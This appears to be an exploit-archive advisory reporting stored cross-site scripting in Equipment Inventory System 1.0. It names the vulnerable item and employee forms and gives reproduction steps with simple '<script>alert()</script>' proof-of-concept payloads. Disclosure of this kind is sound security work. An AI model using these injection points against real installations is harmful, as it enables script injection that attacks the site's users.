Equipment Inventory System 1.0 Cross Site Scripting

2021.03.29

Credit: Jitendra Kumar Tripathi

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3
Vulnerable Parameters: Item List , Employee Details , Position of Employee
*Steps to reproduce:*
1: Log in with a valid username and password.
2: Navigate to http://localhost/deped/admin/item.php
Add Item
Payload : <script>alert(1)</script>
Navigate to http://localhost/deped/admin/employee.php
Add Employee
Payload : <script>alert(2)</script>
Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Equipment Inventory System 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.